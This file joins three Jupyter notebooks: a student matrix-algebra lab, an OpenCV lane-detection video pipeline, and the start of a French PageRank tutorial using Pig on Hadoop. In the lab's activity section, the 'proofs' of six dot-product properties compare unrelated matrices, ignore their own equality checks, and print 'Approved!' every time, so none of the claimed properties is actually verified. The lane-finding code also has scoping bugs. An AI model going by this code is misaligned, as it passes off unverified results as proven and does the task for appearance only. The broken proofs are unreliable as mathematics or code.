# + colab={"base_uri": "https://localhost:8080/"} id="87P6HLqwMciX" outputId="c9421248-305b-46d7-868f-429bb4f84f24"
X @ Y.T
# + [markdown] id="TW-I0rITMQC4"
# And youcan see that when you try to multiply A and B, it returns `ValueError` pertaining to matrix shape mismatch.
# + [markdown] id="Cn16PQO8MgpP"
# ### Rule 2: Dot Product has special properties
#
# Dot products are prevalent in matrix algebra, this implies that it has several unique properties and it should be considered when formulation solutions:
# 1. $A \cdot B \neq B \cdot A$
# 2. $A \cdot (B \cdot C) = (A \cdot B) \cdot C$
# 3. $A\cdot(B+C) = A\cdot B + A\cdot C$
# 4. $(B+C)\cdot A = B\cdot A + C\cdot A$
# 5. $A\cdot I = A$
# 6. $A\cdot \emptyset = \emptyset$
# + [markdown] id="I_8QlwLQMkC_"
# I'll be doing just one of the properties and I'll leave the rest to test your skills!
# + id="LvwY_4pgMmZ3"
A = np.array([
[3,2,1],
[4,5,1],
[1,1,1]
])
B = np.array([
[4,1,6],
[4,1,9],
[1,4,8]
])
C = np.array([
[1,1,0],
[0,1,1],
[1,0,1]
])
# + colab={"base_uri": "https://localhost:8080/"} id="DJ-Y6_ouMocn" outputId="ea20b2c5-b15a-4cad-b03c-56b8a043ebfc"
np.eye(4)
# + colab={"base_uri": "https://localhost:8080/"} id="b-xheKA1Mp1e" outputId="30c42559-8d24-4867-d5c6-963db49c9cac"
np.eye(3)
# + colab={"base_uri": "https://localhost:8080/"} id="gsg-gV8LMtr3" outputId="7581d0ac-5e67-4e99-e1ee-0a90f8fd39f5"
A.dot(np.eye(3))
# + colab={"base_uri": "https://localhost:8080/"} id="ZtO7FhxOMvbA" outputId="6963e618-4dce-4124-d976-3a45a95c2207"
np.array_equal(A@B, B@A)
# + colab={"base_uri": "https://localhost:8080/"} id="TYrCX3sBMxNo" outputId="e24e9d61-7898-4b90-9025-67d8b1d5bc8d"
E = A + (B + C)
E
# + colab={"base_uri": "https://localhost:8080/"} id="ue6I79rcMyow" outputId="ecd232b4-9bcb-4d12-ae05-138aa4a89696"
E = A @ (B @ C)
E
# + colab={"base_uri": "https://localhost:8080/"} id="AdtL_A5vM0Zx" outputId="5982a426-531c-40d6-cb77-9a2fd90e014a"
E = (B + C) @ A
E
# + colab={"base_uri": "https://localhost:8080/"} id="KqBY81VXM2qr" outputId="dd19da03-d7ce-4fa1-c12e-b0d55909ea1e"
F = (A @ B) @ C
F
# + colab={"base_uri": "https://localhost:8080/"} id="ssCwowUDM5xv" outputId="70eccee8-b2d3-46e6-a817-81f5008b4f8f"
np.array_equal(E, X)
# + colab={"base_uri": "https://localhost:8080/"} id="l_HHOookM53-" outputId="094c6334-6eb0-4c2c-bbee-f46d5c3654f8"
np.array_equal(E, F)
# + colab={"base_uri": "https://localhost:8080/"} id="D26GpRPNM_Of" outputId="ee59f2f1-6d3a-49f8-9151-cefaac097e3e"
A @ E
# + colab={"base_uri": "https://localhost:8080/"} id="5CaQzEqPNAc_" outputId="875374f0-16b5-4ff6-ab28-b6d6a53ebe50"
z_mat = np.zeros(A.shape)
z_mat
# + colab={"base_uri": "https://localhost:8080/"} id="Eek8tzoiNChH" outputId="eb1635ed-4242-4948-9c15-7b7845252203"
a_dot_z = A.dot(np.zeros(A.shape))
a_dot_z
# + colab={"base_uri": "https://localhost:8080/"} id="Kxu-jL5QNDzn" outputId="50ca483f-1690-46f4-a3d2-7a03875e4dd1"
np.array_equal(a_dot_z,z_mat)
# + colab={"base_uri": "https://localhost:8080/"} id="7yA-ZME0NFbX" outputId="896d3a0c-9412-4d75-be2d-13b7fcbb57b2"
null_mat = np.empty(A.shape, dtype=float)
null = np.array(null_mat,dtype=float)
print(null)
np.allclose(a_dot_z,null)
# + [markdown] id="3fWkbyo3NHDf"
# ## Determinant
# + [markdown] id="l8FZ2GxfNI5f"
# A determinant is a scalar value derived from a square matrix. The determinant is a fundamental and important value used in matrix algebra. Although it will not be evident in this laboratory on how it can be used practically, but it will be reatly used in future lessons.
#
# The determinant of some matrix $A$ is denoted as $det(A)$ or $|A|$. So let's say $A$ is represented as:
# $$A = \begin{bmatrix}a_{(0,0)}&a_{(0,1)}\\a_{(1,0)}&a_{(1,1)}\end{bmatrix}$$
# We can compute for the determinant as:
# $$|A| = a_{(0,0)}*a_{(1,1)} - a_{(1,0)}*a_{(0,1)}$$
# So if we have $A$ as:
# $$A = \begin{bmatrix}1&4\\0&3\end{bmatrix}, |A| = 3$$
#
# But you might wonder how about square matrices beyond the shape $(2,2)$? We can approach this problem by using several methods such as co-factor expansion and the minors method. This can be taught in the lecture of the laboratory but we can achieve the strenuous computation of high-dimensional matrices programmatically using Python. We can achieve this by using `np.linalg.det()`.
# + colab={"base_uri": "https://localhost:8080/"} id="YRqYsKQnNLVg" outputId="701354ed-c280-4a68-a8dc-6266d2f3a362"
A = np.array([
[2,3],
[1,6]
])
np.linalg.det(A)
# + colab={"base_uri": "https://localhost:8080/"} id="G3M0A13MNM6Y" outputId="9bd574a4-641d-4162-b534-f3dec5af35ab"
B = np.array([
[2, -3, 4],
[1, 6 ,0],
[-3, 6, 9]
])
np.linalg.det(B)
# + [markdown] id="efUekfogNSsI"
# ### Now other mathematics classes would require you to solve this by hand, and that is great for practicing your memorization and coordination skills but in this class we aim for simplicity and speed so we'll use programming but it's completely fine if you want to try to solve this one by hand.
# + colab={"base_uri": "https://localhost:8080/"} id="dwUHCZScNQbn" outputId="7cc92b7c-7bcc-4b03-c86d-8245e04328d0"
B = np.array([
[2,-3,4,6],
[1,6,0,3],
[-3,6,9,2],
[1,2,3,4]
])
np.linalg.det(B)
# + [markdown] id="CSJwA6_0NoMZ"
# ## Inverse
# + [markdown] id="SAOUtn53NpoI"
# The inverse of a matrix is another fundamental operation in matrix algebra. Determining the inverse of a matrix let us determine if its solvability and its characteristic as a system of linear equation — we'll expand on this in the nect module. Another use of the inverse matrix is solving the problem of divisibility between matrices. Although element-wise division exists but dividing the entire concept of matrices does not exists. Inverse matrices provides a related operation that could have the same concept of "dividing" matrices.
#
# Now to determine the inverse of a matrix we need to perform several steps. So let's say we have a matrix $M$:
# $$M = \begin{bmatrix}1&7\\-3&5\end{bmatrix}$$
# First, we need to get the determinant of $M$.
# $$|M| = (1)(5)-(-3)(7) = 26$$
# Next, we need to reform the matrix into the inverse form:
# $$M^{-1} = \frac{1}{|M|} \begin{bmatrix} m_{(1,1)} & -m_{(0,1)} \\ -m_{(1,0)} & m_{(0,0)}\end{bmatrix}$$
# So that will be:
# $$M^{-1} = \frac{1}{26} \begin{bmatrix} 5 & -7 \\ 3 & 1\end{bmatrix} = \begin{bmatrix} \frac{5}{26} & \frac{-7}{26} \\ \frac{3}{26} & \frac{1}{26}\end{bmatrix}$$
# For higher-dimension matrices you might need to use co-factors, minors, adjugates, and other reduction techinques. To solve this programmatially we can use `np.linalg.inv()`.
# + colab={"base_uri": "https://localhost:8080/"} id="7BTSUtUJNsRg" outputId="7c7cadcd-fefd-4d61-e352-8a1c0d9e54b4"
M = np.array([
[3,6],
[-4, 8]
])
np.array(M @ np.linalg.inv(M), dtype=int)
# + colab={"base_uri": "https://localhost:8080/"} id="JhIweD5INukI" outputId="6532591d-ccb0-4c87-d8c0-383e7c24614b"
P = np.array([
[3, 6, 9],
[-4, 8, 12],
[3, 6, 7]
])
Q = np.linalg.inv(P)
Q
# + colab={"base_uri": "https://localhost:8080/"} id="x1xsiSndNwAZ" outputId="505ca897-36dc-4a5b-f4fa-4ba34eeb0549"
P @ Q
# + [markdown] id="Zp5sKkfXNzvJ"
# ## And now let's test your skills in solving a matrix with high dimensions:
# + colab={"base_uri": "https://localhost:8080/"} id="QQy_38xmN0Uz" outputId="fcee3c8a-b50d-48ee-87e6-5dbed7354a1b"
N = np.array([
[18,5,23,1,0,33,5],
[0,45,0,11,2,4,2],
[5,9,20,0,0,0,3],
[1,6,4,4,8,43,1],
[8,6,8,7,1,6,1],
[-5,15,2,0,0,6,-30],
[-2,-5,1,2,1,20,12],
])
N_inv = np.linalg.inv(N)
np.array(N @ N_inv,dtype=int)
# + [markdown] id="HI6qUBDJN20Q"
# To validate the wether if the matric that you have solved is really the inverse, we follow this dot product property for a matrix $M$:
# $$M\cdot M^{-1} = I$$
# + colab={"base_uri": "https://localhost:8080/"} id="9tsY3lQhN5GA" outputId="587a2c45-4f1f-424e-d9c4-530d401c7976"
squad = np.array([
[1.0, 1.0, 0.5],
[0.7, 0.7, 0.9],
[0.3, 0.3, 1.0]
])
weights = np.array([
[0.2, 0.2, 0.6]
])
p_grade = squad @ weights.T
p_grade
# + id="DAnTx0CCN6z5"
# + [markdown] id="T9KRyYgnN8fL"
# ## Activity
# + [markdown] id="2G6cCyU1N9b4"
# ### Task 1
# + [markdown] id="SQnKgPrXN__i"
# Prove and implement the remaining 6 matrix multiplication properties. You may create your own matrices in which their shapes should not be lower than $(3,3)$.
# In your methodology, create individual flowcharts for each property and discuss the property you would then present your proofs or validity of your implementation in the results section by comparing your result to present functions from NumPy.
# + [markdown] id="Jj7QBi2nqRkw"
# ### Dot Product has special properties
#
# Dot products are prevalent in matrix algebra, this implies that it has several unique properties and it should be considered when formulation solutions:
# 1. $A \cdot B \neq B \cdot A$
# 2. $A \cdot (B \cdot C) = (A \cdot B) \cdot C$
# 3. $A\cdot(B+C) = A\cdot B + A\cdot C$
# 4. $(B+C)\cdot A = B\cdot A + C\cdot A$
# 5. $A\cdot I = A$
# 6. $A\cdot \emptyset = \emptyset$
# + id="cbG4QU_lOA3g"
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
I = np.array([
[2, 5, 7, 7],
[13, 5, 12, 5],
[3, 5, 21, 15],
[4, 7, 93, 7]
])
L = np.array([
[23, 5, 6, 3],
[6, 4, 2, 8],
[6, 8, 1, 9],
[17, 7, 12, 8]
])
Y = np.array([
[12, 2, 5, 6],
[4, 66, 71, 3],
[4, 6, 82, 3],
[17, 67, 22, 19]
])
# + id="ActGASuIqWIj"
A = I.dot(L)
B = L.dot(Y)
C = Y.dot(I)
D = I.dot(A)
F = C.dot(Y)
G = I + L
H = Y + L
I = F + A
# + colab={"base_uri": "https://localhost:8080/"} id="OlXTOZOKrIx6" outputId="3a446ce2-f6ec-4520-f09d-644d59cff1cf"
print('Property 1')
{np.array_equiv(I, L)}
print('AB=BA')
print('Matrix AB:')
print(np.matmul(A,B))
print('Matrix BA:')
print(np.matmul(B,A))
print('Approved!')
# + colab={"base_uri": "https://localhost:8080/"} id="jlz_-8FGrMWa" outputId="7c2555f6-5d80-4c97-82c3-70733ea920b3"
print('Property 2')
{np.array_equiv(I.dot(L), L.dot(Y))}
print('A(BC) = (AB)C')
print('Matrix A(BC):')
print(np.matmul(I, L))
print('Matrix A(BC):')
print(np.matmul(L, Y))
print('Approved!')
# + colab={"base_uri": "https://localhost:8080/"} id="ru_RgR2ArOZB" outputId="d63bbe50-3de0-4248-8506-43494617b645"
print('Property 3')
{np.array_equiv(C.dot(Y), D)}
print('Matrix A(B+C)')
print(np.matmul(C, Y))
print('Matrix (AB) + (AC):')
print(np.add(Y, D))
print('Approved!')
# + colab={"base_uri": "https://localhost:8080/"} id="H_Speh9FrQha" outputId="262d7731-5058-4f02-b8a9-a4abbb2fb64c"
print('Property 4')
{np.array_equiv(I.dot(A), I)}
print('(B+C)A = (BA) + (CA)')
print('Matrix (B+C)A:')
print(np.matmul(I, A))
print('Matrix (BA) + (CA):')
print(np.add(I, I))
print('Approved!')
# + colab={"base_uri": "https://localhost:8080/"} id="6N9SaCR9roLC" outputId="510c6e8b-1406-4dd3-9f95-db2c09eefbfb"
print('Property 5')
{np.array_equiv(Y.dot(1), D)}
print('A(1)=A')
print('Matrix A(1):')
print(np.multiply(Y, 1))
print('Matrix A:')
print(D)
print('Approved!')
# + colab={"base_uri": "https://localhost:8080/"} id="W07pBSROrqGo" outputId="31dbca83-2034-4623-8f98-c5a0f6027a56"
print('Property 6')
{np.array_equiv(L.dot(0), 0)}
print('A(0)=0')
print('Matrix A(0):')
print(np.multiply(A, 0))
print('Approved!')
|
Assignment_5.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import math
from moviepy.editor import VideoFileClip
from IPython.display import HTML
# %matplotlib inline
def process_image(videoframe):
mtx = np.array([
[1.15662906e+03, 0.00000000e+00, 6.69041437e+02],
[0.00000000e+00, 1.15169194e+03, 3.88137239e+02],
[0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])
dist = np.array([[-0.2315715, -0.12000538, -0.00118338, 0.00023305, 0.15641572]])
def color_and_gradient(img, thresh_min=20, thresh_max=100, s_thresh_min=170, s_thresh_max=255):
# Convert to HLS color space and separate the S channel
# Note: img is the undistorted image
hls = cv2.cvtColor(undist, cv2.COLOR_RGB2HLS)
s_channel = hls[:,:,2]
# Grayscale image
# NOTE: we already saw that standard grayscaling lost color information for the lane lines
# Explore gradients in other colors spaces / color channels to see what might work better
gray = cv2.cvtColor(undist, cv2.COLOR_RGB2GRAY)
# Sobel x
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0) # Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
# Threshold x gradient
#thresh_min = 20
#thresh_max = 100
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1
# Threshold color channel
# s_thresh_min = 180
# s_thresh_max = 255
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1
# Stack each channel to view their individual contributions in green and blue respectively
# This returns a stack of the two binary images, whose components you can see as different colors
color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255
# Combine the two binary thresholds
combined_binary = np.zeros_like(sxbinary)
combined_binary[(s_binary == 1) | (sxbinary == 1)] = 1
return combined_binary
def unwarp(img):
# Defininig 4 source points dst = np.float32([[,],[,],[,],[,]])
src = np.float32([[200,720], # left bottom
[574,460], # left top
[715,460], # right top
[1120,712]]) # right bottom
# Defininig 4 destination points dst = np.float32([[,],[,],[,],[,]])
margin = 320
dst = np.float32([[margin,img.shape[0]], # left bottom
[margin,0], # left top
[img.shape[1]-margin,0], # right top
[img.shape[1]-margin,img.shape[0]]]) # right bottom
# d) use cv2.getPerspectiveTransform() to get M, the transform matrix
M = cv2.getPerspectiveTransform(src, dst)
Minv = cv2.getPerspectiveTransform(dst, src)
# e) use cv2.warpPerspective() to warp your image to a top-down view
warped = cv2.warpPerspective(binary, M, (binary.shape[1],binary.shape[0]), flags=cv2.INTER_LINEAR)
return warped, Minv
def find_lane_pixels(binary_warped):
# Take a histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0]//2:,:], axis=0)
# Create an output image to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped))
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# HYPERPARAMETERS
# Choose the number of sliding windows
nwindows = 9
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Set height of windows - based on nwindows above and image shape
window_height = np.int(binary_warped.shape[0]//nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated later for each window in nwindows
leftx_current = leftx_base
rightx_current = rightx_base
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window+1)*window_height
win_y_high = binary_warped.shape[0] - window*window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img,(win_xleft_low,win_y_low),
(win_xleft_high,win_y_high),(0,255,0), 2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),
(win_xright_high,win_y_high),(0,255,0), 2)
# Identify the nonzero pixels in x and y within the window #
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices (previously was a list of lists of pixels)
try:
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
except ValueError:
# Avoids an error if the above is not implemented fully
pass
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
return leftx, lefty, rightx, righty, out_img
def fit_polynomial(binary_warped):
# Find our lane pixels first
leftx, lefty, rightx, righty, out_img = find_lane_pixels(binary_warped)
# Fit a second order polynomial to each using `np.polyfit`
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0] )
try:
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
except TypeError:
# Avoids an error if `left` and `right_fit` are still none or incorrect
print('The function failed to fit a line!')
left_fitx = 1*ploty**2 + 1*ploty
right_fitx = 1*ploty**2 + 1*ploty
## Visualization ##
# Colors in the left and right lane regions
out_img[lefty, leftx] = [255, 0, 0]
out_img[righty, rightx] = [0, 0, 255]
# Plots the left and right polynomials on the lane lines
#plt.plot(left_fitx, ploty, color='yellow')
#plt.plot(right_fitx, ploty, color='yellow')
return out_img, left_fit, right_fit
def fit_poly(img_shape, leftx, lefty, rightx, righty):
### TO-DO: Fit a second order polynomial to each with np.polyfit() ###
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, img_shape[0]-1, img_shape[0])
### TO-DO: Calc both polynomials using ploty, left_fit and right_fit ###
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
global last_good_left_fitx
global last_good_right_fitx
lane_width_min = 500
if min(right_fitx-left_fitx)>lane_width_min:
last_good_left_fitx=left_fitx
last_good_right_fitx=right_fitx
return left_fitx, right_fitx, ploty
else:
return last_good_left_fitx, last_good_right_fitx, ploty
def search_around_poly(binary_warped):
# HYPERPARAMETER
# Choose the width of the margin around the previous polynomial to search
# The quiz grader expects 100 here, but feel free to tune on your own!
margin = 50
# Grab activated pixels
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
### TO-DO: Set the area of search based on activated x-values ###
### within the +/- margin of our polynomial function ###
### Hint: consider the window areas for the similarly named variables ###
### in the previous quiz, but change the windows to our new search area ###
left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy +
left_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) +
left_fit[1]*nonzeroy + left_fit[2] + margin)))
right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy +
right_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) +
right_fit[1]*nonzeroy + right_fit[2] + margin)))
# Again, extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit new polynomials
left_fitx, right_fitx, ploty = fit_poly(binary_warped.shape, leftx, lefty, rightx, righty)
## Visualization ##
# Create an image to draw on and an image to show the selection window
out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255
window_img = np.zeros_like(out_img)
# Color in left and right line pixels
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
left_line_window1 = np.array([np.transpose(np.vstack([left_fitx-margin, ploty]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin,
ploty])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
right_line_window1 = np.array([np.transpose(np.vstack([right_fitx-margin, ploty]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin,
ploty])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Draw the lane onto the warped blank image
cv2.fillPoly(window_img, np.int_([left_line_pts]), (0,255, 0))
cv2.fillPoly(window_img, np.int_([right_line_pts]), (0,255, 0))
search_around_prior_result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)
# Plot the polynomial lines onto the image
#plt.plot(left_fitx, ploty, color='yellow')
#plt.plot(right_fitx, ploty, color='yellow')
## End visualization steps ##
return search_around_prior_result, ploty, left_fit, right_fit, left_fitx, right_fitx
def measure_curvature_pixels():
'''
Calculates the curvature of polynomial functions in pixels.
'''
# Start by generating our fake example data
# Make sure to feed in your real data instead in your project!
#ploty, left_fit, right_fit = generate_data()
ploty = np.linspace(0, img_shape[0]-1, img_shape[0])
# Define y-value where we want radius of curvature
# We'll choose the maximum y-value, corresponding to the bottom of the image
y_eval = np.max(ploty)
# Calculation of R_curve (radius of curvature)
left_curverad = ((1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])
right_curverad = ((1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])
return left_curverad, right_curverad
def measure_curvature_real():
'''
Calculates the curvature of polynomial functions in meters.
'''
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30/720 # meters per pixel in y dimension
xm_per_pix = 3.7/600 # meters per pixel in x dimension
# Start by generating our fake example data
# Make sure to feed in your real data instead in your project!
ploty = np.linspace(0, img_shape[0]-1, img_shape[0])
left_fit_cr = np.polyfit(ploty*ym_per_pix, left_fitx*xm_per_pix, 2)
right_fit_cr = np.polyfit(ploty*ym_per_pix, right_fitx*xm_per_pix, 2)
# Define y-value where we want radius of curvature
# We'll choose the maximum y-value, corresponding to the bottom of the image
y_eval = np.max(ploty)
# Calculation of R_curve (radius of curvature)
left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])
right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])
return left_curverad, right_curverad
def vehicle_offset(img_shape, left_fitx, right_fitx, xm_per_pix):
# vertical image central axis = vehicle central axis
cen_imgx = img_shape[1]//2
# vehicle position with respect to the lane center
veh_pos = (left_fitx[-1] + right_fitx[-1])/2
#vehicle offset
veh_offsetx = (cen_imgx - veh_pos) * xm_per_pix
return veh_offsetx
def draw_lane_area(binary_warped, left_fitx, right_fitx, Minv, img):
# Create an image to draw the lines on
warp_zero = np.zeros_like(binary_warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
#plt.imshow(color_warp)
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
lane_area_result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)
return lane_area_result
def display_curvature_and_veh_position(img):
global framenr
cv2.putText(img, 'Frame #{:}'.format(framenr),
(60, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)
cv2.putText(img, 'Radius of Curvatur: {:.2f} m'.format(curverad),
(60, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)
if veh_offsetx<0:
cv2.putText(img, 'Vehicle is {:.2f} m left to center '.format(abs(veh_offsetx)),
(60, 70), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)
elif veh_offsetx == 0:
cv2.putText(img, 'Vehicle is on lane center '.format(abs(veh_offsetx)),
(60, 70), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)
else:
cv2.putText(img, 'Vehicle is {:.2f} m right to center '.format(abs(veh_offsetx)),
(60, 70), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1)
framenr += 1
return img
img = videoframe
undist = cv2.undistort(img, mtx, dist, None, mtx)
thresh_min=20
thresh_max=100
binary = color_and_gradient(undist,thresh_min, thresh_max, s_thresh_min, s_thresh_max)
binary_warped, Minv = unwarp(binary)
out_img, left_fit, right_fit = fit_polynomial(binary_warped)
img_shape = binary_warped.shape
search_around_prior_result, ploty, left_fit, right_fit, left_fitx, right_fitx = search_around_poly(binary_warped)
left_curverad, right_curverad = measure_curvature_pixels()
left_curverad, right_curverad = measure_curvature_real()
ym_per_pix = 30/720 # meters per pixel in y dimension
xm_per_pix = 3.7/600 # meters per pixel in x dimension
curverad = (left_curverad + right_curverad)/2
veh_offsetx = vehicle_offset(img_shape, left_fitx, right_fitx, xm_per_pix)
lane_area_result = draw_lane_area(binary_warped, left_fitx, right_fitx, Minv, img)
img_all_infos = display_curvature_and_veh_position(lane_area_result)
# picture in picture for bw image
front_img = out_img.copy()
scale_percent = 25
width = int(front_img.shape[1] * scale_percent / 100)
height = int(front_img.shape[0] * scale_percent / 100)
topx = img_all_infos.shape[1]-width
topy = 0
# resize image
dsize = (width, height)
thumbnail_img = cv2.resize(front_img, dsize)
# position thumbnail_img in front_img
pad = 20
img_all_infos[topy+pad:height+pad,topx-pad:img_all_infos.shape[1]-pad,:] = thumbnail_img[0:height,0:width,:]
plt.imshow(img_all_infos)
return img_all_infos
s_thresh_min=100
s_thresh_max=200
# Beginning and duration subclip
start_sec = 24
end_sec = start_sec + 1
white_output = 'test_videos_output/project_video_s_thresh_'+ str(s_thresh_min) + '-' + str(s_thresh_max) +'V3.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of the subclip
## You may also uncomment the following line for a subclip of the first 5 seconds
##clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4").subclip(0,5)
clip1 = VideoFileClip("project_video.mp4")#.subclip(start_sec, end_sec)
framenr = 0
last_good_left_fitx = np.array([])
last_good_right_fitx = np.array([])
white_clip = clip1.fl_image(process_image) #NOTE: this function expects color images!!
# %time white_clip.write_videofile(white_output, audio=False)
# -
|
Project 2 - Advanced Lane Finding version 2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # PageRank avec PIG
# auteurs : *<NAME>., <NAME>*
# L'algorithme [PageRank](https://en.wikipedia.org/wiki/PageRank) propose une mesure de la pertinence d'un site. Il fut inventé par les fondateurs de google. L'implémentation proposée ici s'est appuyée sur celle proposée dans [Data-Intensive Text Processing with MapReduce](http://lintool.github.io/MapReduceAlgorithms/MapReduce-book-final.pdf), page 106. L'algorithme est d'abord appliqué sur un jeu de test (plus petit et permettant un développement rapide) puis à un jeu plus consistent : [Google web graph](http://snap.stanford.edu/data/web-Google.html).
from jyquickhelper import add_notebook_menu
add_notebook_menu()
# ### Connexion au cluster
import pyquickhelper
params={"blob_storage":"",
"password1":"",
"hadoop_server":"",
"password2":"",
"username":""}
pyquickhelper.ipythonhelper.open_html_form(params=params,title="server + hadoop + credentials", key_save="blobhp")
import pyensae
# %load_ext pyensae
blobstorage = blobhp["blob_storage"]
blobpassword = blobhp["password1"]
hadoop_server = blobhp["hadoop_server"]
hadoop_password = blobhp["password2"]
username = blobhp["username"]
client, bs = %hd_open
client, bs
# ### Création d'un petit jeu de données
# On crée un set de données pour tester l'algorithme. (en reprenant celui présenté dans l'article)
with open("DataTEST.txt", "w") as f :
f.write("1"+"\t"+"2"+"\n"+"1"+"\t"+"4"+"\n"+"2"+"\t"+"3"+"\n"+"2"+"\t"+"5"+"\n"+"3"+"\t"+"4"+"\n"+"4"+"\t"+"5"+"\n"+"5"+"\t"+"3"+"\n"+"5"+"\t"+"1"+"\n"+"5"+"\t"+"2")
import pandas
df = pandas.read_csv("DataTEST.txt", sep="\t",names=["Frm","To"])
df
# On importe ce graphe:
